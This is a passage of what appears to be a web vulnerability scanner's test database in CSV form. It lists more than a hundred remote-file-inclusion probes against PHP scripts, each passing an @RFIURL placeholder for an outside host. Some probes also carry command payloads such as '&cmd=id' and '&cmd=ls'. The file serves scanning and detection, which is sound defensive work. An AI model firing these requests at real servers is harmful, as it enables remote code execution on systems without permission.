"004499","5292","c","/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004500","5292","c","/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004501","5292","c","/components/com_mospray/scripts/admin.php?basedir=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004502","5292","c","/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004503","5292","c","/components/com_mp3_allopass/allopass.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004504","5292","c","/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004505","5292","c","/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004506","5292","c","/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004507","5292","c","/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004508","5292","c","/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004509","5292","c","/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004510","5292","c","/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004511","5292","c","/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004512","5292","c","/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004513","5292","c","/components/com_smf/smf.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004514","5292","c","/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004515","5292","c","/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004516","5292","c","/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004517","5292","c","/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004518","5292","c","/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004519","5292","c","/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004520","5292","c","/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004521","5292","c","/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004522","5292","c","/components/core/connect.php?language_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004523","5292","c","/components/minibb/bb_plugins.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004524","5292","c","/components/minibb/index.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004525","5292","c","/components/minibb/index.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004526","5292","c","/components/xmlparser/loadparser.php?absoluteurl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004527","5292","c","/compteur/mapage.php?chemin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004528","5292","c","/conf.php?securelib=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004529","5292","c","/conf.php?securelib=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004530","5292","c","/config.inc.php3?rel_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004531","5292","c","/config.inc.php?_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004532","5292","c","/config.inc.php?path_escape=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004533","5292","c","/config.inc.php?path_escape=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004534","5292","c","/config.php?full_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004535","5292","c","/config.php?full_path_to_db=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004536","5292","c","/config.php?fullpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004537","5292","c","/config.php?incpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004538","5292","c","/config.php?path_to_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004539","5292","c","/config.php?rel_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004540","5292","c","/config.php?rel_path=@RFIURL? ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004541","5292","c","/config.php?returnpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004542","5292","c","/config.php?sql_language=@RFIURL?&cmd=0wn3d By Dr","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004543","5292","c","/config.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004544","5292","c","/config.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004545","5292","c","/config/config_admin.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004546","5292","c","/config/config_main.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004547","5292","c","/config/config_member.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004548","5292","c","/config/dbutil.bck.php?confdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004549","5292","c","/config/mysql_config.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004550","5292","c","/config/sender.php?ROOT_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004551","5292","c","/configuration.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004552","5292","c","/confirmUnsubscription.php?output=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004553","5292","c","/connect.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004554","5292","c","/connexion.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004555","5292","c","/contact.php?blog_theme=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004556","5292","c","/contacts.php?cal_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004557","5292","c","/contenido/external/frontend/news.php?cfg[path][includes]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004558","5292","c","/content.php?content=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004559","5292","c","/content/admin.php?pwfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004560","5292","c","/content/content.php?fileloc=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004561","5292","c","/content/delete.php?pwfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004562","5292","c","/content/modify.php?pwfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004563","5292","c","/content/modify_go.php?pwfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004564","5292","c","/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004565","5292","c","/contrib/mx_glance_sdesc.php?mx_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004566","5292","c","/contrib/phpBB2/modules.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004567","5292","c","/controllers/MySQLController.php?baseDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004568","5292","c","/controllers/SQLController.php?baseDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004569","5292","c","/controllers/SetupController.php?baseDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004570","5292","c","/controllers/VideoController.php?baseDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004571","5292","c","/controllers/ViewController.php?baseDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004572","5292","c","/convert-date.php?cal_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004573","5292","c","/convert/mvcw.php?step=1&vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004574","5292","c","/convert/mvcw.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004575","5292","c","/core/admin/admin.php?p=admin&absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004576","5292","c","/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004577","5292","c","/core/admin/categories_add.php?absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004578","5292","c","/core/admin/categories_remove.php?absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004579","5292","c","/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004580","5292","c","/core/admin/editdel.php?p=admin&absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004581","5292","c","/core/admin/ftpfeature.php?p=admin&absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004582","5292","c","/core/admin/login.php?absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004583","5292","c","/core/admin/pgRSSnews.php?absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004584","5292","c","/core/admin/showcat.php?absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004585","5292","c","/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004586","5292","c","/core/archive_cat.php?absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004587","5292","c","/core/archive_nocat.php?absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004588","5292","c","/core/aural.php?site_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004589","5292","c","/core/aural.php?site_absolute_path=@RFIURL?&cmd=dir","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004590","5292","c","/core/editor.php?editor_insert_bottom=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004591","5292","c","/core/includes.php?CMS_ROOT=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004592","5292","c","/core/recent_list.php?absoluteurl@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004593","5292","c","/corpo.php?pagina=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004594","5292","c","/cp2.php?securelib=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004595","5292","c","/cp2.php?securelib=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004596","5292","c","/cpe/index.php?repertoire_config=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004597","5292","c","/crea.php?plancia=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004598","5292","c","/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004599","5292","c","/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004600","5292","c","/creat_news_all.php?language=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004601","5292","c","/create_file.php?target=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004602","5292","c","/cron.php?ROOT_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004603","5292","c","/cron.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004604","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004605","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004606","5292","c","/cross.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004607","5292","c","/cross.php?url=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004608","5292","c","/custom_vars.php?sys[path_addon]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004609","5292","c","/customer/product.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004610","5292","c","/cwb/comanda.php?INCLUDE_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004611","5292","c","/datei.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004612","5292","c","/db/PollDB.php?CONFIG_DATAREADERWRITER=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004613","5292","c","/db/mysql/db.inc.php?SPL_CFG[dirroot]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004614","5292","c","/dbcommon/include.php?_APP_RELATIVE_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004615","5292","c","/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004616","5292","c","/debugger.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004617","5292","c","/decoder/gallery.php?ccms_library_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004618","5292","c","/decoder/markdown.php?ccms_library_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004619","5292","c","/defaults_setup.php?ROOT_PATH=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004620","5292","c","/defines.php?WEBCHATPATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004621","5292","c","/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=@RFIURL&","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004622","5292","c","/depouilg.php3?NomVote=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004623","5292","c","/development.php?root_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004624","5292","c","/development.php?root_prefix=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004625","5292","c","/dfcode.php?DFORUM_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004626","5292","c","/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004627","5292","c","/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004628","5292","c","/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004629","5292","c","/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004630","5292","c","/dialog.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004631","5292","c","/dialogs/a.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004632","5292","c","/dialogs/collorpicker.php?spaw_dir=@RFIURL&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004633","5292","c","/dialogs/img.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004634","5292","c","/dialogs/img_library.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004635","5292","c","/dialogs/table.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004636","5292","c","/dialogs/td.php?spaw_dir=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004637","5292","c","/digitaleye_Path/module.php?menu=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004638","5292","c","/dir/prepend.php?_PX_config[manager_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004639","5292","c","/dir_thatware/config.php?root_path=@RFIURL'","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004640","5292","c","/direct.php?rf=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004641","5292","c","/direction/index.php?repertoire_config=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004642","5292","c","/directory/index.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004643","5292","c","/display.php?pag=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004644","5292","c","/display.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004645","5292","c","/displayCategory.php?basepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004646","5292","c","/dix.php3?url_phpartenaire=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004647","5292","c","/dm-albums/template/album.php?SECURITY_FILE=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004648","5292","c","/doc/admin/index.php?ptinclude=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
